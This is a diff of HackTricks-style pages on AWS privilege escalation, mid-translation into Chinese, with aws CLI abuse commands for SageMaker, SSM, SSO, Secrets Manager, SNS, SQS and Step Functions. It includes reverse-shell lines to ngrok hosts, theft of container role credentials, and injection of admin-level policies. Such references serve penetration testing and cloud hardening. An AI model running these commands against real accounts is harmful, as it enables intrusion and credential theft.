+**潜在影响:** 提升到附加的 sagemaker 服务角色。 ### `sagemaker:CreateProcessingJob,iam:PassRole` -An attacker with those permissions can make **sagemaker execute a processingjob** with a sagemaker role attached to it. The attacked can indicate the definition of the container that will be run in an **AWS managed ECS account instance**, and **steal the credentials of the IAM role attached**. - +拥有这些权限的攻击者可以使 **sagemaker 执行一个 processingjob**,并附加一个 sagemaker 角色。攻击者可以指明将在 **AWS 管理的 ECS 账户实例** 中运行的容器的定义,并 **窃取附加的 IAM 角色的凭证**。 ```bash # I uploaded a python docker image to the ECR aws sagemaker create-processing-job \ - --processing-job-name privescjob \ - --processing-resources '{"ClusterConfig": {"InstanceCount": 1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \ - --app-specification "{\"ImageUri\":\".dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \ - --role-arn +--processing-job-name privescjob \ +--processing-resources '{"ClusterConfig": {"InstanceCount": 1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \ +--app-specification "{\"ImageUri\":\".dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \ +--role-arn # In my tests it took 10min to receive the shell curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" #To get the creds ``` - -**Potential Impact:** Privesc to the sagemaker service role specified. +**潜在影响:** 提升到指定的 sagemaker 服务角色。 ### `sagemaker:CreateTrainingJob`, `iam:PassRole` -An attacker with those permissions will be able to create a training job, **running an arbitrary container** on it with a **role attached** to it. Therefore, the attcke will be able to steal the credentials of the role. +拥有这些权限的攻击者将能够创建一个训练作业,**在其上运行任意容器**,并附加一个**角色**。因此,攻击者将能够窃取该角色的凭证。 > [!WARNING] -> This scenario is more difficult to exploit than the previous one because you need to generate a Docker image that will send the rev shell or creds directly to the attacker (you cannot indicate a starting command in the configuration of the training job). +> 这个场景比前一个更难以利用,因为你需要生成一个 Docker 镜像,该镜像将直接将 rev shell 或凭证发送给攻击者(你无法在训练作业的配置中指定启动命令)。 > > ```bash -> # Create docker image +> # 创建 docker 镜像 > mkdir /tmp/rev -> ## Note that the trainning job is going to call an executable called "train" -> ## That's why I'm putting the rev shell in /bin/train -> ## Set the values of and +> ## 注意训练作业将调用一个名为 "train" 的可执行文件 +> ## 这就是我将 rev shell 放在 /bin/train 的原因 +> ## 设置 的值 > cat > /tmp/rev/Dockerfile < FROM ubuntu > RUN apt update && apt install -y ncat curl @@ -79,40 +71,34 @@ An attacker with those permissions will be able to create a training job, **runn > cd /tmp/rev > sudo docker build . 
-t reverseshell
>
> # Upload it to ECR
> sudo docker login -u AWS -p $(aws ecr get-login-password --region ) .dkr.ecr..amazonaws.com/
> sudo docker tag reverseshell:latest .dkr.ecr..amazonaws.com/reverseshell:latest
> sudo docker push .dkr.ecr..amazonaws.com/reverseshell:latest
> ```
-
```bash
# Create the training job with the docker image created
aws sagemaker create-training-job \
-    --training-job-name privescjob \
-    --resource-config '{"InstanceCount": 1,"InstanceType": "ml.m4.4xlarge","VolumeSizeInGB": 50}' \
-    --algorithm-specification '{"TrainingImage":".dkr.ecr..amazonaws.com/reverseshell", "TrainingInputMode": "Pipe"}' \
-    --role-arn \
-    --output-data-config '{"S3OutputPath": "s3://"}' \
-    --stopping-condition '{"MaxRuntimeInSeconds": 600}'
+    --training-job-name privescjob \
+    --resource-config '{"InstanceCount": 1,"InstanceType": "ml.m4.4xlarge","VolumeSizeInGB": 50}' \
+    --algorithm-specification '{"TrainingImage":".dkr.ecr..amazonaws.com/reverseshell", "TrainingInputMode": "Pipe"}' \
+    --role-arn \
+    --output-data-config '{"S3OutputPath": "s3://"}' \
+    --stopping-condition '{"MaxRuntimeInSeconds": 600}'

# To get the creds
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
## Creds env var value example: /v2/credentials/proxy-f00b92a68b7de043f800bd0cca4d3f84517a19c52b3dd1a54a37c1eca040af38-customer
```
-
-**Potential Impact:** Privesc to the sagemaker service role specified.
+**Potential Impact:** Privilege escalation to the specified SageMaker service role.

### `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole`

-An attacker with those permissions will (potentially) be able to create an **hyperparameter training job**, **running an arbitrary container** on it with a **role attached** to it.\
-&#xNAN;_I haven't exploited because of the lack of time, but looks similar to the previous exploits, feel free to send a PR with the exploitation details._
+An attacker with these permissions will (potentially) be able to create a **hyperparameter tuning job** that **runs an arbitrary container** with a **role attached** to it.\
+_This has not been exploited here for lack of time, but it looks similar to the previous exploits; feel free to send a PR with the exploitation details._

-## References
+## References

- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/)

{{#include ../../../banners/hacktricks-training.md}}

-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md
index bdc01433b..e8d6084c8 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md
@@ -4,7 +4,7 @@

## Secrets Manager

-For more info about secrets manager check:
+For more info about Secrets Manager, check:

{{#ref}}
../aws-services/aws-secrets-manager-enum.md
@@ -12,44 +12,34 @@ For more info about secrets manager check:

### `secretsmanager:GetSecretValue`

-An attacker with this permission can get the **saved value inside a secret** in AWS **Secretsmanager**.
-
+An attacker with this permission can read the **value saved inside a secret** in AWS **Secrets Manager**.
```bash
aws secretsmanager get-secret-value --secret-id  # Get value
```
-
-**Potential Impact:** Access high sensitive data inside AWS secrets manager service.
+**Potential Impact:** Access to highly sensitive data stored in the AWS Secrets Manager service.

### `secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`)

-With the previous permissions it's possible to **give access to other principals/accounts (even external)** to access the **secret**.
Note that in order to **read secrets encrypted** with a KMS key, the user also needs to have **access over the KMS key** (more info in the [KMS Enum page](../aws-services/aws-kms-enum.md)).
-
+With the previous permissions it's possible to **grant other principals/accounts (even external ones) access to the secret**. Note that in order to **read secrets encrypted** with a KMS key, the user also needs **access over the KMS key** (more info in the [KMS Enum page](../aws-services/aws-kms-enum.md)).
```bash
aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id
aws secretsmanager put-resource-policy --secret-id --resource-policy file:///tmp/policy.json
```
-
policy.json:
-
```json
{
-    "Version": "2012-10-17",
-    "Statement": [
-        {
-            "Effect": "Allow",
-            "Principal": {
-                "AWS": "arn:aws:iam:::root"
-            },
-            "Action": "secretsmanager:GetSecretValue",
-            "Resource": "*"
-        }
-    ]
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Effect": "Allow",
+            "Principal": {
+                "AWS": "arn:aws:iam:::root"
+            },
+            "Action": "secretsmanager:GetSecretValue",
+            "Resource": "*"
+        }
+    ]
}
```
-
{{#include ../../../banners/hacktricks-training.md}}

-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md
index 699bb58cf..969f7200b 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md
@@ -4,7 +4,7 @@

## SNS

-For more information check:
+For more information, check:

{{#ref}}
../aws-services/aws-sns-enum.md
@@ -12,36 +12,26 @@ For more information check:

### `sns:Publish`

-An attacker could send malicious or unwanted messages to the SNS topic, potentially causing data corruption, triggering unintended actions, or exhausting resources.
-
+An attacker could send malicious or unwanted messages to the SNS topic, potentially causing data corruption, triggering unintended actions, or exhausting resources.
```bash
aws sns publish --topic-arn  --message
```
-
-**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion.
+**Potential Impact**: Vulnerability exploitation, data corruption, unintended actions, or resource exhaustion.

### `sns:Subscribe`

-An attacker could subscribe or to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic.
-
+An attacker could subscribe to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic.
```bash
aws sns subscribe --topic-arn  --protocol  --endpoint
```
-
-**Potential Impact**: Unauthorized access to messages (sensitve info), service disruption for applications relying on the affected topic.
+**Potential Impact**: Unauthorized access to messages (sensitive info), service disruption for applications relying on the affected topic.

### `sns:AddPermission`

-An attacker could grant unauthorized users or services access to an SNS topic, potentially getting further permissions.
-
+An attacker could grant unauthorized users or services access to an SNS topic, potentially gaining further permissions.
```bash
aws sns add-permission --topic-arn  --label  --aws-account-id  --action-name
```
-
-**Potential Impact**: Unauthorized access to the topic, message exposure, or topic manipulation by unauthorized users or services, disruption of normal functioning for applications relying on the topic.
+**Potential Impact**: Unauthorized access to the topic, message exposure or topic manipulation by unauthorized users or services, and disruption of applications relying on the topic.
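As a quick sanity check (an addition to the original text), the effect of `add-permission` can be verified by re-reading the topic policy, and the injected statement can later be removed by its label. This assumes `sns:GetTopicAttributes` / `sns:RemovePermission` are also available; `<topic-arn>` and `<label>` are placeholders:
```bash
# Review the topic policy after the change
aws sns get-topic-attributes --topic-arn <topic-arn> --query "Attributes.Policy"

# Optional cleanup: remove the statement added with add-permission
aws sns remove-permission --topic-arn <topic-arn> --label <label>
```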
{{#include ../../../banners/hacktricks-training.md}}

-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md
index 384ed8430..3439c0865 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md
@@ -4,7 +4,7 @@

## SQS

-For more information check:
+For more information, check:

{{#ref}}
../aws-services/aws-sqs-and-sns-enum.md
@@ -12,39 +12,29 @@ For more information check:

### `sqs:AddPermission`

-An attacker could use this permission to grant unauthorized users or services access to an SQS queue by creating new policies or modifying existing policies. This could result in unauthorized access to the messages in the queue or manipulation of the queue by unauthorized entities.
-
+An attacker could use this permission to grant unauthorized users or services access to an SQS queue by creating new policies or modifying existing ones. This could result in unauthorized access to the messages in the queue or manipulation of the queue by unauthorized entities.
```bash
aws sqs add-permission --queue-url  --actions  --aws-account-ids  --label
```
-
-**Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services.
+**Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services.

### `sqs:SendMessage` , `sqs:SendMessageBatch`

-An attacker could send malicious or unwanted messages to the SQS queue, potentially causing data corruption, triggering unintended actions, or exhausting resources.
-
+An attacker could send malicious or unwanted messages to the SQS queue, potentially causing data corruption, triggering unintended actions, or exhausting resources.
```bash
aws sqs send-message --queue-url  --message-body
aws sqs send-message-batch --queue-url  --entries
```
-
-**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion.
+**Potential Impact**: Vulnerability exploitation, data corruption, unintended actions, or resource exhaustion.

### `sqs:ReceiveMessage`, `sqs:DeleteMessage`, `sqs:ChangeMessageVisibility`

-An attacker could receive, delete, or modify the visibility of messages in an SQS queue, causing message loss, data corruption, or service disruption for applications relying on those messages.
-
+An attacker could receive, delete, or modify the visibility of messages in an SQS queue, causing message loss, data corruption, or service disruption for applications relying on those messages.
```bash
aws sqs receive-message --queue-url
aws sqs delete-message --queue-url  --receipt-handle
aws sqs change-message-visibility --queue-url  --receipt-handle  --visibility-timeout
```
-
-**Potential Impact**: Steal sensitive information, Message loss, data corruption, and service disruption for applications relying on the affected messages.
+**Potential Impact**: Theft of sensitive information, message loss, data corruption, and service disruption for applications relying on the affected messages.

{{#include ../../../banners/hacktricks-training.md}}

-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md
index c4067e2ca..84af36044 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md
@@ -4,7 +4,7 @@

## SSM

-For more info about SSM check:
+For more info about SSM, check:

{{#ref}}
../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
@@ -12,8 +12,7 @@ For more info about SSM check:

### `ssm:SendCommand`

-An attacker with the permission **`ssm:SendCommand`** can **execute commands in instances** running the Amazon SSM Agent and **compromise the IAM Role** running inside of it.
- +具有权限 **`ssm:SendCommand`** 的攻击者可以 **在运行Amazon SSM Agent的实例中执行命令** 并 **危害其中运行的IAM角色**。 ```bash # Check for configured instances aws ssm describe-instance-information @@ -21,26 +20,22 @@ aws ssm describe-sessions --state Active # Send rev shell command aws ssm send-command --instance-ids "$INSTANCE_ID" \ - --document-name "AWS-RunShellScript" --output text \ - --parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash" +--document-name "AWS-RunShellScript" --output text \ +--parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash" ``` - -In case you are using this technique to escalate privileges inside an already compromised EC2 instance, you could just capture the rev shell locally with: - +在您使用此技术在已被攻陷的 EC2 实例中提升权限的情况下,您可以通过以下方式在本地捕获 rev shell: ```bash # If you are in the machine you can capture the reverseshel inside of it nc -lvnp 4444 #Inside the EC2 instance aws ssm send-command --instance-ids "$INSTANCE_ID" \ - --document-name "AWS-RunShellScript" --output text \ - --parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash" +--document-name "AWS-RunShellScript" --output text \ +--parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash" ``` - -**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running. +**潜在影响:** 直接提升权限到附加在运行实例上的 EC2 IAM 角色,这些实例运行着 SSM Agents。 ### `ssm:StartSession` -An attacker with the permission **`ssm:StartSession`** can **start a SSH like session in instances** running the Amazon SSM Agent and **compromise the IAM Role** running inside of it. - +拥有权限 **`ssm:StartSession`** 的攻击者可以 **在运行 Amazon SSM Agent 的实例中启动类似 SSH 的会话**,并 **危害其中运行的 IAM 角色**。 ```bash # Check for configured instances aws ssm describe-instance-information @@ -49,68 +44,58 @@ aws ssm describe-sessions --state Active # Send rev shell command aws ssm start-session --target "$INSTANCE_ID" ``` - > [!CAUTION] -> In order to start a session you need the **SessionManagerPlugin** installed: [https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html](https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html) +> 要开始会话,您需要安装 **SessionManagerPlugin**: [https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html](https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html) -**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running. +**潜在影响:** 直接提升权限到附加到运行实例的 EC2 IAM 角色,这些实例运行着 SSM Agents。 -#### Privesc to ECS - -When **ECS tasks** run with **`ExecuteCommand` enabled** users with enough permissions can use `ecs execute-command` to **execute a command** inside the container.\ -According to [**the documentation**](https://aws.amazon.com/blogs/containers/new-using-amazon-ecs-exec-access-your-containers-fargate-ec2/) this is done by creating a secure channel between the device you use to initiate the “_exec_“ command and the target container with SSM Session Manager. 
(SSM Session Manager Plugin necesary for this to work)\ -Therefore, users with `ssm:StartSession` will be able to **get a shell inside ECS tasks** with that option enabled just running: +#### 提升权限到 ECS +当 **ECS 任务** 以 **`ExecuteCommand` 启用** 运行时,具有足够权限的用户可以使用 `ecs execute-command` 在容器内 **执行命令**。\ +根据 [**文档**](https://aws.amazon.com/blogs/containers/new-using-amazon-ecs-exec-access-your-containers-fargate-ec2/),这是通过在您用来启动“_exec_”命令的设备与目标容器之间创建安全通道来完成的,使用 SSM Session Manager。(SSM Session Manager Plugin 是此功能正常工作的必要条件)\ +因此,具有 `ssm:StartSession` 权限的用户将能够通过运行以下命令 **在启用该选项的 ECS 任务中获取 shell**: ```bash aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID" ``` - ![](<../../../images/image (185).png>) -**Potential Impact:** Direct privesc to the `ECS`IAM roles attached to running tasks with `ExecuteCommand` enabled. +**潜在影响:** 直接提升权限到附加到运行任务的 `ECS` IAM 角色,且该任务启用了 `ExecuteCommand`。 ### `ssm:ResumeSession` -An attacker with the permission **`ssm:ResumeSession`** can re-**start a SSH like session in instances** running the Amazon SSM Agent with a **disconnected** SSM session state and **compromise the IAM Role** running inside of it. - +拥有权限 **`ssm:ResumeSession`** 的攻击者可以在运行 Amazon SSM Agent 的实例中重新**启动 SSH 类会话**,该会话处于**断开**的 SSM 会话状态,并**危害其中运行的 IAM 角色**。 ```bash # Check for configured instances aws ssm describe-sessions # Get resume data (you will probably need to do something else with this info to connect) aws ssm resume-session \ - --session-id Mary-Major-07a16060613c408b5 +--session-id Mary-Major-07a16060613c408b5 ``` - -**Potential Impact:** Direct privesc to the EC2 IAM roles attached to running instances with SSM Agents running and disconected sessions. +**潜在影响:** 直接提升权限到附加到运行实例的 EC2 IAM 角色,这些实例运行着 SSM 代理并且有断开的会话。 ### `ssm:DescribeParameters`, (`ssm:GetParameter` | `ssm:GetParameters`) -An attacker with the mentioned permissions is going to be able to list the **SSM parameters** and **read them in clear-text**. In these parameters you can frequently **find sensitive information** such as SSH keys or API keys. - +拥有上述权限的攻击者将能够列出 **SSM 参数** 并 **以明文读取它们**。在这些参数中,您经常可以 **找到敏感信息**,例如 SSH 密钥或 API 密钥。 ```bash aws ssm describe-parameters # Suppose that you found a parameter called "id_rsa" aws ssm get-parameters --names id_rsa --with-decryption aws ssm get-parameter --name id_rsa --with-decryption ``` - -**Potential Impact:** Find sensitive information inside the parameters. +**潜在影响:** 在参数中找到敏感信息。 ### `ssm:ListCommands` -An attacker with this permission can list all the **commands** sent and hopefully find **sensitive information** on them. - +拥有此权限的攻击者可以列出所有发送的 **命令**,并希望在其中找到 **敏感信息**。 ``` aws ssm list-commands ``` - -**Potential Impact:** Find sensitive information inside the command lines. +**潜在影响:** 在命令行中查找敏感信息。 ### `ssm:GetCommandInvocation`, (`ssm:ListCommandInvocations` | `ssm:ListCommands`) -An attacker with these permissions can list all the **commands** sent and **read the output** generated hopefully finding **sensitive information** on it. - +拥有这些权限的攻击者可以列出所有发送的 **命令** 并 **读取生成的输出**,希望能找到 **敏感信息**。 ```bash # You can use any of both options to get the command-id and instance id aws ssm list-commands @@ -118,19 +103,14 @@ aws ssm list-command-invocations aws ssm get-command-invocation --command-id --instance-id ``` - -**Potential Impact:** Find sensitive information inside the output of the command lines. 
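As an illustrative extension of the previous commands (not in the original), the calls can be chained into a small loop that dumps the output of every invocation the credentials can see; it assumes the same `ssm:ListCommands`, `ssm:ListCommandInvocations` and `ssm:GetCommandInvocation` permissions:
```bash
# Dump stdout/stderr of every visible command invocation
for cmd in $(aws ssm list-commands --query "Commands[].CommandId" --output text); do
  for inst in $(aws ssm list-command-invocations --command-id "$cmd" --query "CommandInvocations[].InstanceId" --output text); do
    aws ssm get-command-invocation --command-id "$cmd" --instance-id "$inst" \
      --query "{Doc:DocumentName,Out:StandardOutputContent,Err:StandardErrorContent}"
  done
done
```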
+**潜在影响:** 在命令行输出中查找敏感信息。 ### Codebuild -You can also use SSM to get inside a codebuild project being built: +您还可以使用 SSM 进入正在构建的 codebuild 项目: {{#ref}} aws-codebuild-privesc.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md index 0fb4e10a1..d882ef897 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md @@ -4,58 +4,53 @@ ## AWS Identity Center / AWS SSO -For more information about AWS Identity Center / AWS SSO check: +有关 AWS Identity Center / AWS SSO 的更多信息,请查看: {{#ref}} ../aws-services/aws-iam-enum.md {{#endref}} > [!WARNING] -> Note that by **default**, only **users** with permissions **form** the **Management Account** are going to be able to access and **control the IAM Identity Center**.\ -> Users from other accounts can only allow it if the account is a **Delegated Adminstrator.**\ -> [Check the docs for more info.](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html) +> 请注意,**默认情况下**,只有来自 **管理账户** 的 **用户** 才能访问和 **控制 IAM Identity Center**。\ +> 其他账户的用户只能在该账户是 **委托管理员** 的情况下允许。\ +> [查看文档以获取更多信息。](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html) -### ~~Reset Password~~ +### ~~重置密码~~ -An easy way to escalate privileges in cases like this one would be to have a permission that allows to reset users passwords. Unfortunately it's only possible to send an email to the user to reset his password, so you would need access to the users email. +在这种情况下,提升权限的一个简单方法是拥有允许重置用户密码的权限。不幸的是,只能向用户发送电子邮件以重置其密码,因此您需要访问用户的电子邮件。 ### `identitystore:CreateGroupMembership` -With this permission it's possible to set a user inside a group so he will inherit all the permissions the group has. 
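Before calling it you normally need the identity store ID, your own user ID and the ID of a privileged group. A hedged enumeration sketch (assuming the corresponding `list-instances` / `list-groups` / `list-users` read permissions are also granted; `<identity-store-id>` is a placeholder) could be:
```bash
# Identity store ID of the IAM Identity Center instance
aws sso-admin list-instances --query "Instances[].{Arn:InstanceArn,IdentityStoreId:IdentityStoreId}"

# Pick a target group (e.g. one mapped to an admin permission set) and your member/user ID
aws identitystore list-groups --identity-store-id <identity-store-id>
aws identitystore list-users --identity-store-id <identity-store-id>
```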
- +拥有此权限后,可以将用户设置在组内,以便他将继承该组的所有权限。 ```bash aws identitystore create-group-membership --identity-store-id --group-id --member-id UserId= ``` - ### `sso:PutInlinePolicyToPermissionSet`, `sso:ProvisionPermissionSet` -An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control - +拥有此权限的攻击者可以向授予其控制下用户的权限集授予额外权限。 ```bash # Set an inline policy with admin privileges aws sso-admin put-inline-policy-to-permission-set --instance-arn --permission-set-arn --inline-policy file:///tmp/policy.yaml # Content of /tmp/policy.yaml { - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "Statement1", - "Effect": "Allow", - "Action": ["*"], - "Resource": ["*"] - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Sid": "Statement1", +"Effect": "Allow", +"Action": ["*"], +"Resource": ["*"] +} +] } # Update the provisioning so the new policy is created in the account aws sso-admin provision-permission-set --instance-arn --permission-set-arn --target-type ALL_PROVISIONED_ACCOUNTS ``` - ### `sso:AttachManagedPolicyToPermissionSet`, `sso:ProvisionPermissionSet` -An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control - +拥有此权限的攻击者可以向其控制下的用户授予的权限集授予额外权限。 ```bash # Set AdministratorAccess policy to the permission set aws sso-admin attach-managed-policy-to-permission-set --instance-arn --permission-set-arn --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess" @@ -63,14 +58,12 @@ aws sso-admin attach-managed-policy-to-permission-set --instance-arn --permission-set-arn --target-type ALL_PROVISIONED_ACCOUNTS ``` - ### `sso:AttachCustomerManagedPolicyReferenceToPermissionSet`, `sso:ProvisionPermissionSet` -An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control. +拥有此权限的攻击者可以向授予其控制下用户的权限集授予额外权限。 > [!WARNING] -> To abuse these permissions in this case you need to know the **name of a customer managed policy that is inside ALL the accounts** that are going to be affected. - +> 在这种情况下,滥用这些权限需要知道**在所有将受到影响的账户中存在的客户管理策略的名称**。 ```bash # Set AdministratorAccess policy to the permission set aws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn --permission-set-arn --customer-managed-policy-reference @@ -78,59 +71,42 @@ aws sso-admin attach-customer-managed-policy-reference-to-permission-set --insta # Update the provisioning so the new policy is created in the account aws sso-admin provision-permission-set --instance-arn --permission-set-arn --target-type ALL_PROVISIONED_ACCOUNTS ``` - ### `sso:CreateAccountAssignment` -An attacker with this permission could give a Permission Set to a user under his control to an account. - +拥有此权限的攻击者可以将权限集分配给其控制下的用户到一个账户。 ```bash aws sso-admin create-account-assignment --instance-arn --target-id --target-type AWS_ACCOUNT --permission-set-arn --principal-type USER --principal-id ``` - ### `sso:GetRoleCredentials` -Returns the STS short-term credentials for a given role name that is assigned to the user. - +返回分配给用户的给定角色名称的 STS 短期凭证。 ``` aws sso get-role-credentials --role-name --account-id --access-token ``` - -However, you need an access token that I'm not sure how to get (TODO). +然而,您需要一个我不确定如何获取的访问令牌(TODO)。 ### `sso:DetachManagedPolicyFromPermissionSet` -An attacker with this permission can remove the association between an AWS managed policy from the specified permission set. 
It is possible to grant more privileges via **detaching a managed policy (deny policy)**. - +拥有此权限的攻击者可以删除指定权限集与AWS托管策略之间的关联。通过**分离托管策略(拒绝策略)**,可以授予更多权限。 ```bash aws sso-admin detach-managed-policy-from-permission-set --instance-arn --permission-set-arn --managed-policy-arn ``` - ### `sso:DetachCustomerManagedPolicyReferenceFromPermissionSet` -An attacker with this permission can remove the association between a Customer managed policy from the specified permission set. It is possible to grant more privileges via **detaching a managed policy (deny policy)**. - +拥有此权限的攻击者可以删除指定权限集与客户管理策略之间的关联。通过**分离管理策略(拒绝策略)**,可以授予更多权限。 ```bash aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn --permission-set-arn --customer-managed-policy-reference ``` - ### `sso:DeleteInlinePolicyFromPermissionSet` -An attacker with this permission can action remove the permissions from an inline policy from the permission set. It is possible to grant **more privileges via detaching an inline policy (deny policy)**. - +拥有此权限的攻击者可以从权限集的内联策略中删除权限。通过分离内联策略(拒绝策略),可以授予**更多权限**。 ```bash aws sso-admin delete-inline-policy-from-permission-set --instance-arn --permission-set-arn ``` - ### `sso:DeletePermissionBoundaryFromPermissionSet` -An attacker with this permission can remove the Permission Boundary from the permission set. It is possible to grant **more privileges by removing the restrictions on the Permission Set** given from the Permission Boundary. - +拥有此权限的攻击者可以从权限集删除权限边界。通过删除权限边界施加的限制,可以授予**更多权限**。 ```bash aws sso-admin delete-permissions-boundary-from-permission-set --instance-arn --permission-set-arn ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md index bfc3adb77..3b3080999 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md @@ -4,7 +4,7 @@ ## Step Functions -For more information about this AWS service, check: +有关此 AWS 服务的更多信息,请查看: {{#ref}} ../aws-services/aws-stepfunctions-enum.md @@ -12,65 +12,58 @@ For more information about this AWS service, check: ### Task Resources -These privilege escalation techniques are going to require to use some AWS step function resources in order to perform the desired privilege escalation actions. +这些权限提升技术将需要使用一些 AWS 步骤函数资源,以执行所需的权限提升操作。 -In order to check all the possible actions, you could go to your own AWS account select the action you would like to use and see the parameters it's using, like in: +为了检查所有可能的操作,您可以登录自己的 AWS 账户,选择您想要使用的操作,并查看它所使用的参数,如下所示:
-Or you could also go to the API AWS documentation and check each action docs: +或者您也可以访问 API AWS 文档,查看每个操作的文档: - [**AddUserToGroup**](https://docs.aws.amazon.com/IAM/latest/APIReference/API_AddUserToGroup.html) - [**GetSecretValue**](https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html) ### `states:TestState` & `iam:PassRole` -An attacker with the **`states:TestState`** & **`iam:PassRole`** permissions can test any state and pass any IAM role to it without creating or updating an existing state machine, enabling unauthorized access to other AWS services with the roles' permissions. potentially. Combined, these permissions can lead to extensive unauthorized actions, from manipulating workflows to alter data to data breaches, resource manipulation, and privilege escalation. - +拥有 **`states:TestState`** 和 **`iam:PassRole`** 权限的攻击者可以测试任何状态并将任何 IAM 角色传递给它,而无需创建或更新现有的状态机,从而可能使其他 AWS 服务的角色权限获得未经授权的访问。结合起来,这些权限可能导致广泛的未经授权的操作,从操纵工作流以更改数据到数据泄露、资源操纵和权限提升。 ```bash aws states test-state --definition --role-arn [--input ] [--inspection-level ] [--reveal-secrets | --no-reveal-secrets] ``` - -The following examples show how to test an state that creates an access key for the **`admin`** user leveraging these permissions and a permissive role of the AWS environment. This permissive role should have any high-privileged policy associated with it (for example **`arn:aws:iam::aws:policy/AdministratorAccess`**) that allows the state to perform the **`iam:CreateAccessKey`** action: +以下示例展示了如何测试一个为 **`admin`** 用户创建访问密钥的状态,利用这些权限和 AWS 环境的宽松角色。这个宽松角色应该与任何高权限策略相关联(例如 **`arn:aws:iam::aws:policy/AdministratorAccess`**),允许该状态执行 **`iam:CreateAccessKey`** 操作: - **stateDefinition.json**: - ```json { - "Type": "Task", - "Parameters": { - "UserName": "admin" - }, - "Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey", - "End": true +"Type": "Task", 